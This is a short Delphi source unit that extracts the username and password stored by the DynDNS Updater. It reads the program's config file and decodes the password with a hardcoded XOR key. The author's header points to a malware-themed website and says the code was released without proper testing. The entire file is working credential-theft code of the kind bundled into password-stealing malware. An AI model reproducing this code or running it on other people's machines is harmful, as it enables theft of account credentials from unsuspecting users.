{ uDynDns

  Author: steve10120
  Description: Recover DynDns's stored accounts.
  Notes: Released without proper testing.
  Website: http://www.malwares-in.net/

}

unit uDynDns;

interface

uses Windows, SysUtils;

type
  TAccountRec = packed record
    Username:   string;
    Password:   string;
  end;

function GetDynDns():TAccountRec;

implementation

function GetAllUsersPath():string;
var
  szBuff: array[0..255] of Char;
begin
  FillChar(szBuff, 256, #0);
  if GetEnvironmentVariable('ALLUSERSPROFILE', szBuff, 256) <> 0 then
  begin
    lstrcat(szBuff, '\');
    Result := szBuff;
  end;
end;

function HexToInt(HexNum: string): LongInt;
begin
   Result:=StrToInt('$' + HexNum) ;
end;

function GetDynDns():TAccountRec;
var
  szAllUsers: string;
  szPath:     string;
  szPass:     string;
  szLine:     string;
  i:          DWORD;
  szChars:    string;
  x:          Byte;
  hFile:      TextFile;
const
  szKey:  string = 't6KzXhCh';
begin
  szAllUsers := GetAllUsersPath;
  if szAllUsers <> '' then
  begin
    szPath := szAllUsers + 'DynDNS\Updater\config.dyndns';
    if FileExists(szPath) then
    begin
      AssignFile(hFile, szPath);
      Reset(hFile);
      while not EOF(hFile) do
      begin
        ReadLn(hFile, szLine);
        if Copy(szLine, 1, 9) = 'Username=' then
          Result.Username := Copy(szLine, 10, Length(szLine));
        if Copy(szLine, 1, 9) = 'Password=' then
        begin
          szPass := Copy(szLine, 10, Length(szLine));
          Break;
        end;
      end;
      CloseFile(hFile);
      i := 1;
      repeat
        szChars := szChars + Chr(HexToInt(Copy(szPass, i, 2)));
        Inc(i, 2);
      until i >= Length(szPass);

      x := 1;
      for i := 1 to Length(szChars) do
      begin
        szChars[i] := Chr(Byte(szChars[i]) xor Byte(szKey[x]));
        if x = 8 then
          x := 1
        else
          Inc(x);
      end;
      Result.Password := szChars;
    end;
  end;
end;

end.